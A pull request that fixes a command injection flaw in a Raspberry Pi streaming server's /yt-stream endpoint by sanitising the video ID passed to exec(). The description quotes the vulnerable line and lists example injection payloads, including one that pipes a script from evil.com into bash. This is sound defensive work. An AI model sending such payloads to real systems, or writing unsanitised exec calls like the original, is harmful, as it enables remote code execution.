### PR TITLE
fix: prevent command injection in YouTube stream endpoint

### DIFF
--- a/picast.js
+++ b/picast.js
@@ -8,8 +8,14 @@ app.get('/', function (req, res) {
 });
 
 app.get('/yt-stream/:url', function (req, res) {
+        // Sanitize URL parameter to prevent command injection
+        var videoId = req.params.url.replace(/[^a-zA-Z0-9_-]/g, '');
+        if (!videoId) {
+                res.status(400).send('Invalid video ID');
+                return;
+        }
         res.send('Streaming YouTube Video...');
-        exec("livestreamer --player=mplayer https://www.youtube.com/watch?v=" + req.params.url + " best");
+        exec("livestreamer --player=mplayer https://www.youtube.com/watch?v=" + videoId + " best");
 });
 
 // Setup PiCAST Server


### PR DESCRIPTION
## Summary

Fix command injection vulnerability in the YouTube streaming endpoint.

## Problem

The `/yt-stream/:url` route passes the URL parameter directly into `exec()`:

```javascript
exec("livestreamer --player=mplayer https://www.youtube.com/watch?v=" + req.params.url + " best");
```

An attacker can execute arbitrary commands:
- `/yt-stream/$(whoami)` — command substitution
- `/yt-stream/;curl+evil.com|bash;` — command chaining
- `/yt-stream/`\`id\`` — backtick injection

## Fix

Sanitize the video ID parameter to only allow YouTube video ID characters `[a-zA-Z0-9_-]`:

```javascript
var videoId = req.params.url.replace(/[^a-zA-Z0-9_-]/g, '');
```

## Impact

- **Type**: Remote Code Execution via Command Injection (CWE-78)
- **OWASP**: A03:2021 — Injection
- **Affected endpoint**: `GET /yt-stream/:url`
- **Risk**: Arbitrary command execution on the Raspberry Pi